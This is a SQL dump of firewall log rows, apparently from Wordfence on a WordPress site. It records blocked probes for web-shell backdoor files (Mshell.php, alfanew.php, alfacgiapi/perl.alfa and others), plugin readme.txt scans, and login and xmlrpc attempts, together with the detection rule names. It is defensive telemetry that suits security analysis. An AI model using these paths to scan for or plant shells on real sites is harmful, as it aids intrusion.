(50522, 1711401274.615727, 1711401273.917100, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/core-stab/RxRprqrj.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9jb3JlLXN0YWIvUnhScHJxcmoucGhw","category":"brute-force","ssl":1}'),
(51878, 0.000000, 1712563773.374625, '\0\0\0\0\0\0\0\0\0\0ÿÿ.cü\n', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51879, 1712563964.947170, 1712563964.350300, '\0\0\0\0\0\0\0\0\0\0ÿÿ€Çxî', 0, 403, 0, 0, 0, 'https://happythinking.com/Mshell.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L01zaGVsbC5waHA=","category":"brute-force","ssl":1}'),
(50610, 1711731982.822657, 1711731982.473000, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com//wp-includes/mari.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly93cC1pbmNsdWRlcy9tYXJpLnBocA==","category":"brute-force","ssl":1}'),
(51873, 1712562406.214158, 1712562404.527600, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹;$', 0, 403, 0, 0, 0, 'https://happythinking.com/', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Lw==","category":"brute-force","ssl":1}'),
(51885, 1712582150.451935, 1712582149.669700, '\0\0\0\0\0\0\0\0\0\0ÿÿ€Çxî', 0, 403, 0, 0, 0, 'https://happythinking.com/web/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dlYi93cC1hZG1pbi9pbnN0YWxsLnBocA==","path":"L3dlYi93cC1hZG1pbi9pbnN0YWxsLnBocA==","category":"discovery-and-probing","ssl":1}'),
(50903, 1712082619.774964, 1712082619.042100, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/autoload_classmap.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2F1dG9sb2FkX2NsYXNzbWFwLnBocA==","category":"brute-force","ssl":1}'),
(52053, 1712761804.409911, 1712761803.891700, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/seo.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3Nlby5waHA=","category":"brute-force","ssl":1}'),
(50288, 1711080812.420548, 1711080812.103000, '\0\0\0\0\0\0\0\0\0\0ÿÿ›…\Z)', 0, 403, 0, 0, 0, 'https://www.happythinking.com/content.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2NvbnRlbnQucGhw","category":"brute-force","ssl":1}'),
(51861, 1712520721.892095, 1712520720.830200, '\0\0\0\0\0\0\0\0\0\0ÿÿÏöRê', 0, 200, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/essential-addons-for-elementor-lite/readme.txt', 'www.google.com', 'Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9lc3NlbnRpYWwtYWRkb25zLWZvci1lbGVtZW50b3ItbGl0ZS9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9lc3NlbnRpYWwtYWRkb25zLWZvci1lbGVtZW50b3ItbGl0ZS9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(50261, 0.000000, 1711070814.207912, '\0\0\0\0\0\0\0\0\0\0ÿÿ£@E', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50654, 1711731906.028802, 1711731905.647700, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///about.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vYWJvdXQucGhw","category":"brute-force","ssl":1}'),
(50653, 1711731907.775328, 1711731907.397400, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///admin.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vYWRtaW4ucGhw","category":"brute-force","ssl":1}'),
(50399, 1711237040.422412, 1711237040.043900, '\0\0\0\0\0\0\0\0\0\0ÿÿ­Ôío', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/simple.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(50292, 1711080799.236704, 1711080798.899300, '\0\0\0\0\0\0\0\0\0\0ÿÿ›…\Z)', 0, 403, 0, 0, 0, 'https://www.happythinking.com/mail.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L21haWwucGhw","category":"brute-force","ssl":1}'),
(50262, 0.000000, 1711071572.807032, '\0\0\0\0\0\0\0\0\0\0ÿÿ£@E', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50263, 0.000000, 1711072336.513486, '\0\0\0\0\0\0\0\0\0\0ÿÿ£@E', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50264, 0.000000, 1711073101.793734, '\0\0\0\0\0\0\0\0\0\0ÿÿ£@E', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50265, 0.000000, 1711073578.973497, '\0\0\0\0\0\0\0\0\0\0ÿÿ€Ç/ô', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari/537.1', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50266, 0.000000, 1711073581.766177, '\0\0\0\0\0\0\0\0\0\0ÿÿhƒ*§', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50645, 1711731919.751611, 1711731919.326200, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com//ioxi-rex4.php7', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly9pb3hpLXJleDQucGhwNw==","category":"brute-force","ssl":1}'),
(50906, 1712082604.200434, 1712082602.986400, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/classsmtps.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2NsYXNzc210cHMucGhw","category":"brute-force","ssl":1}'),
(50876, 1712062404.897433, 1712062404.538300, '\0\0\0\0\0\0\0\0\0\0ÿÿãpç', 0, 403, 0, 0, 0, 'https://happythinking.com/radio.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3JhZGlvLnBocA==","category":"brute-force","ssl":1}'),
(50883, 1712082368.234653, 1712082367.703300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/upfile.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3VwZmlsZS5waHA=","category":"brute-force","ssl":1}'),
(50874, 1712062407.393112, 1712062406.944500, '\0\0\0\0\0\0\0\0\0\0ÿÿãpç', 0, 403, 0, 0, 0, 'https://happythinking.com/xmrlpc.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3htcmxwYy5waHA=","category":"brute-force","ssl":1}'),
(50875, 1712062406.189678, 1712062405.752200, '\0\0\0\0\0\0\0\0\0\0ÿÿãpç', 0, 403, 0, 0, 0, 'https://happythinking.com/plugins.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3BsdWdpbnMucGhw","category":"brute-force","ssl":1}'),
(50699, 1711810307.615557, 1711810307.271300, '\0\0\0\0\0\0\0\0\0\0ÿÿT÷ÿ', 0, 403, 0, 0, 0, 'https://www.happythinking.com/alfanew.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FsZmFuZXcucGhw","category":"brute-force","ssl":1}'),
(50660, 1711731895.817800, 1711731895.399700, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///repeater.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vcmVwZWF0ZXIucGhw","category":"brute-force","ssl":1}'),
(51722, 1712368132.679088, 1712368132.387600, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/woocommerce-product-addon/readme.txt', NULL, 'Mozilla/5.0 (Linux; Android 14; SM-A102U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.101 Mobile Safari/537.36', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93b29jb21tZXJjZS1wcm9kdWN0LWFkZG9uL3JlYWRtZS50eHQ=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93b29jb21tZXJjZS1wcm9kdWN0LWFkZG9uL3JlYWRtZS50eHQ=","category":"discovery-and-probing","ssl":1}'),
(50661, 1711731893.312939, 1711731892.942700, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///wp-consar.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3AtY29uc2FyLnBocA==","category":"brute-force","ssl":1}'),
(50698, 1711810309.409017, 1711810309.074300, '\0\0\0\0\0\0\0\0\0\0ÿÿT÷ÿ', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-security.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLXNlY3VyaXR5LnBocA==","category":"brute-force","ssl":1}'),
(50720, 1711858479.469140, 1711858478.423200, '\0\0\0\0\0\0\0\0\0\0ÿÿ€Çöª', 0, 403, 0, 0, 0, 'https://happythinking.com/alfacgiapi/perl.alfa', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FsZmFjZ2lhcGkvcGVybC5hbGZh","category":"brute-force","ssl":1}'),
(50458, 1711359144.969422, 1711359144.615800, '\0\0\0\0\0\0\0\0\0\0ÿÿT÷ÿ', 0, 403, 0, 0, 0, 'https://www.happythinking.com/updates.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3VwZGF0ZXMucGhw","category":"brute-force","ssl":1}'),
(51930, 1712637548.269731, 1712637547.865900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/classsmtps.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2NsYXNzc210cHMucGhw","category":"brute-force","ssl":1}'),
